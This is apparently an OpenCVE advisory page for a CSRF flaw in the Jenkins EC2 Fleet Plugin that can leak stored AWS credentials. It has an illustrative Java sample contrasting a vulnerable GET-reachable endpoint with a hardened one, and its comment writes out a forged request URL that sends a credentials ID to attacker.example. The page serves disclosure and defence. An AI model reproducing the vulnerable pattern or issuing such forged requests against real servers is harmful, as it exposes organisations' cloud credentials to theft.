Description
A cross-site request forgery (CSRF) vulnerability in Jenkins EC2 Fleet Plugin 4.2.3.539.v8fedff2a_81c3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing AWS credentials stored in Jenkins.
Published: 2026-06-24
Score: 5.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The Jenkins EC2 Fleet Plugin contains a cross-site request forgery flaw in an endpoint that connects to a caller-supplied URL using a caller-supplied credentials ID. An attacker who already knows a valid credentials ID (the ID must be obtained some other way; the flaw itself does not reveal it) can lure a logged-in Jenkins user into issuing a forged request, causing Jenkins to connect to an attacker-controlled URL with the AWS credentials stored under that ID and thereby disclose them. The result is credential theft followed by unauthorized use of the associated AWS account, bounded by whatever IAM permissions those keys carry.

Affected Systems

Jenkins EC2 Fleet Plugin versions 4.2.3.539.v8fedff2a_81c3 and earlier.

Risk and Exploitability

The CVSS 3.1 base score is 5.4 (Medium; vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N), the SSVC assessment records no known exploitation, and no EPSS score is available. Jenkins CSRF findings typically stem from an endpoint that performs a privileged action without requiring a POST request, so the Jenkins crumb (anti-CSRF token) check, which is only enforced on POST, never applies and a request forged from an attacker-controlled page is accepted under the victim's session. Exploitation requires the attacker to know a valid credentials ID and to get a victim who can reach the endpoint to visit the attacker's page. The flaw yields credential disclosure, not code execution on the Jenkins controller; the practical risk is set by what the exfiltrated AWS keys are permitted to do.
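As an added illustration (not the EC2 Fleet plugin's source, and not a description of its actual endpoint), the following Java shows the Jenkins form-validation pattern that produces this class of finding, with the vulnerable and hardened versions side by side. The class, method and parameter names (`ExampleCloudDescriptorMethods`, `doTestConnection`, `endpoint`, `credentialsId`), the `X-Example-Access-Key` stand-in header and the `.amazonaws.com` allow-list are hypothetical; the Jenkins core, Stapler, Credentials plugin and AWS Credentials plugin APIs it calls are real, so it compiles against those plugin dependencies but cannot run outside a Jenkins controller.

```java
package example;

import com.amazonaws.auth.AWSCredentials;
import com.cloudbees.jenkins.plugins.awscredentials.AmazonWebServicesCredentials;
import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import com.cloudbees.plugins.credentials.domains.DomainRequirement;
import hudson.security.ACL;
import hudson.util.FormValidation;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.verb.POST;

import java.net.HttpURLConnection;
import java.net.URL;
import java.util.Collections;
import java.util.Locale;

/**
 * Hypothetical descriptor-style web methods (NOT the EC2 Fleet plugin's code).
 * Stapler routes a public doTestConnection(...) method on a Descriptor to
 * .../descriptorByName/<fqcn>/testConnection. Both variants take the same
 * parameters; only the hardened one is safe to expose.
 */
public class ExampleCloudDescriptorMethods {

    /** Resolve a credentials ID to the stored AWS credentials, or null if there is none. */
    static AmazonWebServicesCredentials lookup(String credentialsId) {
        return CredentialsMatchers.firstOrNull(
                CredentialsProvider.lookupCredentials(
                        AmazonWebServicesCredentials.class,
                        Jenkins.get(),
                        ACL.SYSTEM,
                        Collections.<DomainRequirement>emptyList()),
                CredentialsMatchers.withId(credentialsId));
    }

    /**
     * VULNERABLE pattern. No HTTP-verb restriction, so the Jenkins crumb (anti-CSRF
     * token) check, which runs only for POST, never applies; no permission check, so
     * any request riding on a logged-in user's session is honoured. A GET such as
     *   /descriptorByName/<fqcn>/testConnectionVulnerable?endpoint=https://attacker.example/&credentialsId=aws-prod
     * placed in an <img> tag on an attacker page is enough to trigger it.
     */
    public FormValidation doTestConnectionVulnerable(@QueryParameter String endpoint,
                                                     @QueryParameter String credentialsId) throws Exception {
        AmazonWebServicesCredentials creds = lookup(credentialsId);
        if (creds == null) {
            return FormValidation.error("No credentials with ID " + credentialsId);
        }
        return probe(endpoint, creds.getCredentials());
    }

    /**
     * HARDENED pattern. @POST makes Stapler reject non-POST requests, which brings the
     * request under the crumb check; the permission check refuses users (and forged
     * requests carrying their session) who may not administer Jenkins; the endpoint
     * allow-list stops stored keys from ever being sent to an arbitrary host.
     */
    @POST
    public FormValidation doTestConnection(@QueryParameter String endpoint,
                                           @QueryParameter String credentialsId) throws Exception {
        Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        if (!isAllowedEndpoint(endpoint)) {
            return FormValidation.error("Endpoint must be an https://...amazonaws.com URL");
        }
        AmazonWebServicesCredentials creds = lookup(credentialsId);
        if (creds == null) {
            return FormValidation.error("No credentials with ID " + credentialsId);
        }
        return probe(endpoint, creds.getCredentials());
    }

    /** Assumed policy for this example: HTTPS only, and only AWS service hostnames. */
    static boolean isAllowedEndpoint(String endpoint) {
        try {
            URL u = new URL(endpoint);
            String host = u.getHost() == null ? "" : u.getHost().toLowerCase(Locale.ROOT);
            return "https".equals(u.getProtocol()) && host.endsWith(".amazonaws.com");
        } catch (Exception e) {
            return false;
        }
    }

    /**
     * Stand-in for the real client call. A genuine AWS client would SigV4-sign the
     * request, which still places the access key ID in the Authorization header and
     * lets the receiving host capture the signature; the hypothetical header here
     * simply makes the leak to an attacker-chosen endpoint explicit.
     */
    static FormValidation probe(String endpoint, AWSCredentials c) throws Exception {
        HttpURLConnection conn = (HttpURLConnection) new URL(endpoint).openConnection();
        conn.setRequestProperty("X-Example-Access-Key", c.getAWSAccessKeyId());
        int status = conn.getResponseCode();
        return status < 400 ? FormValidation.ok("Connected (HTTP " + status + ")")
                            : FormValidation.error("HTTP " + status);
    }
}
```

The two fixes that matter for CSRF are the `@POST` annotation and the explicit permission check; enabling the global crumb issuer changes nothing for the vulnerable variant because the crumb filter never inspects GET requests. The endpoint allow-list is a separate defence against the "attacker-specified URL" half of the finding and is shown as one reasonable policy, not as the plugin's.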

Generated by OpenCVE AI on June 24, 2026 at 15:08 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the plugin to a version that fixes the CSRF issue as soon as the maintainers publish one; at the time of this page no fixed version is listed, so check the Jenkins security advisory for the plugin once it appears.
  • Treat the AWS credentials stored in Jenkins for this plugin as potentially exposed: create new access keys in AWS IAM, update the Jenkins credentials entries, revoke the old keys, and review CloudTrail for use of the old keys from unexpected sources.
  • Until a fix is available, reduce exposure by removing or disabling the plugin, or by restricting which users can log in to Jenkins and reach the plugin's endpoints (a forged request executes with the victim's permissions).
  • Keep the global CSRF protection (crumb issuer) enabled, as it is by default in current Jenkins releases, but do not rely on it as the workaround: crumbs are only validated on POST requests, so they do not protect a plugin endpoint that accepts the action over GET.


Advisories

No advisories yet.

History

Wed, 24 Jun 2026 16:30:00 +0000

Type: Metrics
Values added:
  cvssV3_1: {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}
  ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 24 Jun 2026 15:30:00 +0000

Type: Title
Values added: Cross-Site Request Forgery in Jenkins EC2 Fleet Plugin Leading to AWS Credentials Exposure

Type: Weaknesses
Values added: CWE-200, CWE-352

Wed, 24 Jun 2026 13:45:00 +0000

Type: Description
Values added: A cross-site request forgery (CSRF) vulnerability in Jenkins EC2 Fleet Plugin 4.2.3.539.v8fedff2a_81c3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing AWS credentials stored in Jenkins.

Type: References
Values added:


MITRE

Status: PUBLISHED

Assigner: jenkins

Published:

Updated: 2026-06-24T15:16:42.103Z

Reserved: 2026-06-24T08:41:44.358Z

Link: CVE-2026-57295

Vulnrichment

Updated: 2026-06-24T15:16:24.145Z

NVD

No data.

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-24T15:15:04Z

Weaknesses
  • CWE-200

    Exposure of Sensitive Information to an Unauthorized Actor

  • CWE-352

    Cross-Site Request Forgery (CSRF)